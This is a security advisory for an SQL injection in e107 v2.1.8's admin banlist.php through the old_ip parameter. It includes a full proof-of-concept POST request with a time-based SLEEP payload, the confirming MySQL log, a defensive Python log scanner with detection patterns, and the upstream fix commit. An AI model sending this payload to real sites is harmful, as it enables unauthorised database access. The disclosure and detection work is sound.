e107 v2.1.8 contains a flaw that may allow an SQL injection attack. The issue is that the /e107_admin/banlist.php script does not properly escape input passed in the old_ip parameter. A remote attacker (with access to the admin page) may inject or manipulate SQL queries sent to the database, allowing the manipulation or disclosure of arbitrary data.
- Log in to the admin page (/e107_admin/admin.php).
- Send a POST request to /e107_admin/banlist.php, rewriting the parameters as follows (Burp Suite was used to edit the request).
```http
POST /e107/e107_admin/banlist.php HTTP/1.1
Host: localhost:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryREEvpmFYBJa0wazD
Cookie: my_cookie=***********************
Content-Length: 464

------WebKitFormBoundaryREEvpmFYBJa0wazD
Content-Disposition: form-data; name="entry_intent"

dummy
------WebKitFormBoundaryREEvpmFYBJa0wazD
Content-Disposition: form-data; name="update_ban"

dummy
------WebKitFormBoundaryREEvpmFYBJa0wazD
Content-Disposition: form-data; name="ban_ip"

dummy
------WebKitFormBoundaryREEvpmFYBJa0wazD
Content-Disposition: form-data; name="old_ip"

'; SELECT SLEEP(10) --'
------WebKitFormBoundaryREEvpmFYBJa0wazD--
```
- The response takes 10 seconds or more to come back. This means the SQL query SELECT SLEEP(10) supplied in old_ip was executed on the server.

This is confirmed by MySQL's general query log:
```
2018-07-31T01:44:07.412204Z 27 Query UPDATE e107_banlist SET `banlist_ip`='dummy', `banlist_admin`='1', `banlist_reason`='', `banlist_notes`='' WHERE banlist_ip='';
2018-07-31T01:44:07.412445Z 27 Query SELECT SLEEP(10) --''
```
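As an added example (not part of the original advisory), the following Python scanner reads the MySQL general-log format shown above and flags the shape this PoC leaves behind: a SLEEP()/BENCHMARK() call, a trailing `--` sequence, and a statement arriving on the same connection within a few milliseconds of a write, which is how a stacked query appears once the server has split it. The sample input is the two log lines above plus one constructed benign lookup; the indicator list and the 5 ms gap threshold are assumptions chosen for this example.

```python
import re
from datetime import datetime

# Constructed sample input: the two general-log lines from the advisory plus
# one benign lookup on another connection, so the scanner has something to ignore.
SAMPLE_LOG = """\
2018-07-31T01:44:07.412204Z 27 Query UPDATE e107_banlist SET `banlist_ip`='dummy', `banlist_admin`='1', `banlist_reason`='', `banlist_notes`='' WHERE banlist_ip='';
2018-07-31T01:44:07.412445Z 27 Query SELECT SLEEP(10) --''
2018-07-31T01:44:09.120000Z 28 Query SELECT banlist_ip FROM e107_banlist WHERE banlist_ip='198.51.100.7'
"""

# general_log line layout: <ISO-8601 timestamp>Z <connection id> <command> <statement>
LOG_RE = re.compile(r"^(?P<ts>\S+Z)\s+(?P<conn>\d+)\s+(?P<cmd>\w+)\s+(?P<sql>.*)$")

# Indicator patterns (assumed for this example, not an exhaustive ruleset).
INDICATORS = [
    ("time-based probe", re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I)),
    ("trailing -- sequence", re.compile(r"(?:--|#)\s*'{0,2}\s*$")),
]
WRITE_PREFIXES = ("UPDATE", "INSERT", "DELETE", "REPLACE")


def parse_general_log(text):
    """Return one dict per Query entry; other commands (Connect, Quit) are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m or m.group("cmd") != "Query":
            continue
        ts = datetime.fromisoformat(m.group("ts").replace("Z", "+00:00"))
        entries.append({"ts": ts, "conn": int(m.group("conn")), "sql": m.group("sql").strip()})
    return entries


def find_suspicious(text, max_gap_ms=5.0):
    """Flag Query entries carrying injection indicators.

    When such an entry follows a write on the same connection within
    max_gap_ms, it is additionally marked as 'stacked after write'.
    """
    findings = []
    last_by_conn = {}  # connection id -> previous Query entry on that connection
    for e in parse_general_log(text):
        reasons = [name for name, rx in INDICATORS if rx.search(e["sql"])]
        prev = last_by_conn.get(e["conn"])
        if reasons and prev is not None:
            gap_ms = (e["ts"] - prev["ts"]).total_seconds() * 1000.0
            if 0 <= gap_ms <= max_gap_ms and prev["sql"].upper().startswith(WRITE_PREFIXES):
                reasons.append("stacked after write")
        if reasons:
            findings.append({
                "ts": e["ts"].isoformat(),
                "conn": e["conn"],
                "sql": e["sql"],
                "reasons": reasons,
            })
        last_by_conn[e["conn"]] = e
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_LOG):
        print(f"conn {f['conn']} at {f['ts']}: {', '.join(f['reasons'])}")
        print(f"    {f['sql']}")
```

Run against a real general log, the same function works line by line; the per-connection bookkeeping is what distinguishes a stacked statement from an unrelated query that merely happened to arrive at the same moment on another connection.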
The cause of the vulnerability is the line where $_POST['old_ip'] is concatenated into the query without proper escaping. Relevant upstream commit:

https://github.com/e107inc/e107/commit/ec483e9379aa622bfcc1b853b189c74288771f27